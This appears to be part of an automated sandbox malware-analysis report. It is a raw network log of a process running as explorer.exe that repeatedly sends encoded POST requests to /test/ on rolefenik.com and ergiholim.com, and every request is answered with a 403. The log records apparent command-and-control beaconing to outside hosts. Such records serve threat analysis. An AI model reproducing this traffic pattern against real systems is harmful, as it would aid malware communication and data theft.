                                                                                                                                          2024-11-13 17:22:47 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:22:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          47192.168.2.650040104.21.92.1054434004C:\Windows\explorer.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:22:48 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:22:48 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:22:48 UTC747INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:48 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d2UylY2yyLd8krg4QAWQA7%2FMpDEEDflZiGfmWW2%2FUGhAsHGoDq0kxc4N8Y6sMvVX8J42CceKjFqTF5%2Fy6nLzUK2mSMFfwmYHkYYsN7rarGwUlDNFUZCjC0C3w03AelW6"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e20722c09d3c997-IAD
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=38217&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=75835&cwnd=32&unsent_bytes=0&cid=fac6eaae224df6ed&ts=378&x=0"
                                                                                                                                          2024-11-13 17:22:48 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:22:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          48192.168.2.650041104.21.15.1624434004C:\Windows\explorer.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:22:49 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:22:49 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:22:50 UTC752INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:50 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kyUeVC7pn%2BgIuEr6wGwsbUPMkVimrai8OwfULubgUOjsW13vRpxADbw2DUgMQcaVovQdwKkBdGR%2Fqmkh5dt83t8UWvd%2BdAPonVy3KT423bou1ZDM%2FOa8R%2FCVn4nrHdB3"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2072346d842089-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=158042&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1167&delivery_rate=20104&cwnd=32&unsent_bytes=0&cid=37b8b5597b73db18&ts=826&x=0"
                                                                                                                                          2024-11-13 17:22:50 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:22:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          49192.168.2.650042104.21.92.1054434004C:\Windows\explorer.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:22:51 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:22:51 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:22:51 UTC748INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:51 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u1D%2B2uFAu8wuBJoGf8cRuydwJSBoEZK%2BfqDJsqohKH%2BtBflxiouudMXTOXtKuBeulOwApCadRnzy9AUwEbhRI5T4Dph6imPDsooD1kCVYsoPqsCRLct5Dw8uQiCWcCwH"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e20723f7ccfd773-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=149219&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=18709&cwnd=32&unsent_bytes=0&cid=9e747e29bab49cac&ts=533&x=0"
                                                                                                                                          2024-11-13 17:22:51 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:22:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          50192.168.2.650043104.21.15.1624434004C:\Windows\explorer.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:22:52 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:22:52 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:22:52 UTC749INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:52 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=00Cl7wKBZ7yV9cbh0d4dK5aSn4k9yT1wMhtcNQ7RqPFHdpq9f9Ahf%2FdZH1bUTbutbKDy3nFHEnSIHcQ%2FFl1STYfj5O39yCLkrTb4SKd6Rw%2Fr0GLwMvrgOe0DBVXR3Wz1"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e207246286f2c86-DFW
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1512&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=2023759&cwnd=235&unsent_bytes=0&cid=330b978d0d1a4d06&ts=309&x=0"
                                                                                                                                          2024-11-13 17:22:52 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:22:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          51192.168.2.650044104.21.92.1054434004C:\Windows\explorer.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:22:53 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:22:53 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:22:54 UTC746INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:54 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6cIsHCbJE1VTrBXvCfTIouycG0j8PfXHS8JKqwP5QVmLktwEth5RAJUIcUJKCpomc%2Bd0yLm7xrI6XzMXVyfKDIUx%2FUGD0ZXYoYuOf09XFVDay3AdeFLOrf13bHMQYbhA"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e20724ebc837372-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=166823&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=1167&delivery_rate=14790&cwnd=32&unsent_bytes=0&cid=00d9681dae08b3b4&ts=582&x=0"
                                                                                                                                          2024-11-13 17:22:54 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:22:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          52192.168.2.650045104.21.15.1624434004C:\Windows\explorer.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:22:55 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:22:55 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:22:56 UTC747INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:56 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=monfumrc7VHXqkomkrIvIZe%2FRHjcZyB2TZSs9dS43RiCxTOCNj8VRp1LzP8Txlrlgln01y%2BzU8BYDpgHBmgMsqh470SpVZSr3iC02G0nUV9nnBJKXDTHC2GK9FpzC410"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2072578bd8d761-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=137573&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=21049&cwnd=32&unsent_bytes=0&cid=e53bcc705fcab88e&ts=1241&x=0"
                                                                                                                                          2024-11-13 17:22:56 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:22:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          53192.168.2.650046104.21.92.105443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:22:57 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
